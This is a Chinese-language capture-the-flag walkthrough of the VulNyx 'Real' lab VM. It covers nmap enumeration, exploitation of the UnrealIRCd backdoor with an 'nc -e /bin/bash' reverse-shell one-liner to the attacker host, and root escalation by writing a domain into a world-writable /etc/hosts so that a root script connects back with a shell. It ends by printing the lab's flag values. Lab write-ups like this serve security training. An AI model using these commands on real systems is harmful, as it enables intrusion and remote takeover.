Real

靶机说明

• https://vulnyx.com/

一、信息收集

1、主机探测

┌──(root㉿kali)-[/miaosec]
└─# nmap -sn 192.168.2.0/24
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-01-08 09:13 CST
Nmap scan report for 192.168.2.1
Host is up (0.00034s latency).
MAC Address: 0A:00:27:00:00:07 (Unknown)
Nmap scan report for 192.168.2.2
Host is up (0.00085s latency).
MAC Address: 08:00:27:48:64:28 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.37
Host is up (0.00078s latency).
MAC Address: 08:00:27:2C:CF:5E (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.4
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 2.13 seconds

靶机IP：192.168.2.37

2、端口扫描

1.全端口扫描

┌──(root㉿kali)-[/miaosec]
└─# nmap --min-rate 10000 -p- 192.168.2.37                      
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-01-08 09:13 CST
Nmap scan report for 192.168.2.37
Host is up (0.0017s latency).
Not shown: 65530 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
6667/tcp open  irc
6697/tcp open  ircs-u
8067/tcp open  infi-async
MAC Address: 08:00:27:2C:CF:5E (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 36.26 seconds

开放端口：22、80、6667、6697、8067

2.详细信息扫描

┌──(root㉿kali)-[/miaosec]
└─# nmap --min-rate 10000 -sT -sV -sC -O -p22,80,6667,6697,8067 192.168.2.37
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-01-08 09:14 CST
Nmap scan report for 192.168.2.37
Host is up (0.00094s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 db:28:2b:ab:63:2a:0e:d5:ea:18:8d:2f:6d:8c:45:2d (RSA)
|   256 cd:a1:c3:2e:20:f0:f3:f6:d3:9b:27:8e:9a:2d:26:11 (ECDSA)
|_  256 db:98:69:a5:8b:bd:05:86:16:3d:9c:8b:30:7b:a3:6c (ED25519)
80/tcp   open  http    Apache httpd 2.4.38 ((Debian))
|_http-title: Apache2 Debian Default Page: It works
|_http-server-header: Apache/2.4.38 (Debian)
6667/tcp open  irc     UnrealIRCd (Admin email example@example.com)
6697/tcp open  irc     UnrealIRCd
8067/tcp open  irc     UnrealIRCd
MAC Address: 08:00:27:2C:CF:5E (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.83 seconds

3.udp扫描

┌──(root㉿kali)-[/miaosec]
└─# nmap -sU --top-ports 100 192.168.2.37                                   
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-01-08 09:15 CST
Nmap scan report for 192.168.2.37
Host is up (0.00071s latency).
Not shown: 99 closed udp ports (port-unreach)
PORT   STATE         SERVICE
68/udp open|filtered dhcpc
MAC Address: 08:00:27:2C:CF:5E (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 102.93 seconds

二、WEB渗透

1、80端口

Apache默认页面

2、IRC协议

IRC，最初是一个纯文本协议，由IANA分配了194/TCP，但通常在6667/TCP和类似端口上运行，以避免需要root权限进行操作。
连接到服务器只需要一个昵称。连接后，服务器会对用户的IP进行反向DNS查找。
用户分为操作员和普通用户，操作员需要用户名和密码以获得更多访问权限。操作员的权限级别各不相同，管理员位于最高层。

💡Tip

https://book.hacktricks.wiki/zh/network-services-pentesting/pentesting-irc.html

在初始扫描中发现 UnrealIRCd 服务运行在多个端口上（6667/tcp、6697/tcp、8067/tcp）。UnrealIRCd 有一个著名的后门漏洞，需要进一步确认目标上的版本是否存在此漏洞。

使用 Nmap 针对 IRC 服务进行漏洞探测

┌──(root㉿kali)-[/miaosec]
└─# nmap -p 6667,6697,8067 --script irc-unrealircd-backdoor 192.168.2.37
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-01-08 09:59 CST
Nmap scan report for 192.168.2.37
Host is up (0.0010s latency).

PORT     STATE SERVICE
6667/tcp open  irc
|_irc-unrealircd-backdoor: Server closed connection, possibly due to too many reconnects. Try again with argument irc-unrealircd-backdoor.wait set to 100 (or higher if you get this message again).
6697/tcp open  ircs-u
8067/tcp open  infi-async
|_irc-unrealircd-backdoor: Looks like trojaned version of unrealircd. See http://seclists.org/fulldisclosure/2010/Jun/277
MAC Address: 08:00:27:2C:CF:5E (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 46.48 seconds

扫描结果确认端口 8067 上运行的 UnrealIRCd 存在后门漏洞。这是一个严重的远程命令执行漏洞（CVE-2010-2075），允许攻击者在服务器上执行任意命令。

三、获取server权限

确认目标存在 UnrealIRCd 后门漏洞后，开始尝试利用该漏洞执行命令

1. 发送反弹 shell 命令

   ┌──(root㉿kali)-[/miaosec]
   └─# echo -e "AB; nc -e /bin/bash 192.168.2.4 4444" | nc 192.168.2.37 8067
   :irc.foonet.com NOTICE AUTH :*** Looking up your hostname...
   :irc.foonet.com NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead
   :irc.foonet.com NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead

2. 获取到shell

   ┌──(root㉿kali)-[~]
   └─# nc -lvnp 4444
   listening on [any] 4444 ...
   connect to [192.168.2.4] from (UNKNOWN) [192.168.2.37] 41932
   id
   uid=1000(server) gid=1000(server) groups=1000(server)

四、权限提升

查看到/opt下面存在文件task具有root权限

server@real:/opt$ ls -la
-rwx---r--  1 root root  277 May  3  2023 task

脚本分析：
尝试 ping 一个指定的域名，如果能通，则反向连接到该域名的 65000 端口，并反弹一个root-shell（即执行 /bin/sh）；否则退出。

server@real:/opt$ cat task
#!/bin/bash

domain='shelly.real.nyx'

function check(){

        timeout 1 bash -c "/usr/bin/ping -c 1 $domain" > /dev/null 2>&1
    if [ "$(echo $?)" == "0" ]; then
        /usr/bin/nohup nc -e /usr/bin/sh $domain 65000
        exit 0
    else
        exit 1
    fi
}

check

查找可写的文件

server@real:/opt$ find / \( -path /proc -o -path /sys \) -prune -o -perm -o=w -type f -print 2>/dev/null
/home/server/irc/Unreal3.2/tmp/103B282.commands.so
/home/server/irc/Unreal3.2/tmp/23FC6410.cloak.so
/home/server/irc/Unreal3.2/ircd.log
/home/server/irc/Unreal3.2/unreal
/home/server/irc/Unreal3.2/src/modules/cloak.so
/home/server/irc/Unreal3.2/src/modules/commands.so
/etc/hosts

发现/etc/hosts可以写入内容，又根据task脚本的信息，尝试写入一个域名解析
将域名shelly.real.nyx解析到攻击机上192.168.2.4

server@real:/opt$ echo "192.168.2.4 shelly.real.nyx" >> /etc/hosts

攻击机上开启监听65000端口，等待一段时间，成功获取到root-shell

┌──(root㉿kali)-[~]
└─# nc -lvnp 65000
listening on [any] 65000 ...
connect to [192.168.2.4] from (UNKNOWN) [192.168.2.37] 50170
id
uid=0(root) gid=0(root) groups=0(root)

五、查看FALG

cat /root/root.txt /home/server/user.txt
593ba7e2d1e66b12e1488d6ea30c8787
3b7fb7c1c8737a5c67dc513657e3efb3